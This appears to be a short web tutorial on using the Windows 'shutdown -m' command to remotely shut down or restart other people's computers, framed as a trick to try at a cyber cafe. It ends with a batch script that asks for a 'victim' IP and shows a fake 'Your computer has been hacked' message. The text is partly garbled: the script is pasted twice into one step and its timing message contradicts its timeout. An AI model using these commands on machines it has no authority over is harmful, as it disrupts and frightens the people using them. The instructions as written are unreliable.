You may try this trick at any cyber cafe.
1. Open the command prompt. This may be done by clicking on the Start button and selecting Run.
2. Type cmd and press Enter.
3. Type shutdown -m\\computername,replacing"computername" with the name of the computer you wish to shutdown or the computer's IP address.
4. Experiment with the shutdown command's switches.
-r will force a restart, disabling any services or user interaction from interrupting it.
-c "comment" will force a comment to appear on the system being shutdown.
-t xx will force a timeout for "xx" seconds. For example, -t 60 would perform a shutdown after a 60-second timeout.
-a will abort the shutdown.
A full command example: shutdown -m\\myserver-r -c "This system will shutdown in 60 seconds" -t 60
ALTERNATIVE
1. Type shutdown -i in the run window.
2. Click the Add box and type the name of the computer you want to shutdown or its IP address. You can select what you want the computer to do.
3. In this mode, it's necessary to add a comment. Do so. Press OK.
INTERESTED IN .BAT FILES
1. Open Notepad and type:
@echo off
echo.
set /p vic=Enter the IP of your victim:
shutdown -m \\%vic% -r -c "Your computer has been hacked. Shutdown in 20 seconds" -t 60
echo Victim Hacked....
pause
exit
2. Save it as anything.bat.set /p vic=Enter the IP of your victim:
shutdown -m \\%vic% -r -c "Your computer has been hacked. Shutdown in 20 seconds" -t 60
echo Victim Hacked....
pause
exit
3. When you run it, it'll ask for your victim's IP. Enter it and you are done.
Love this article?Share it with your friends on Facebook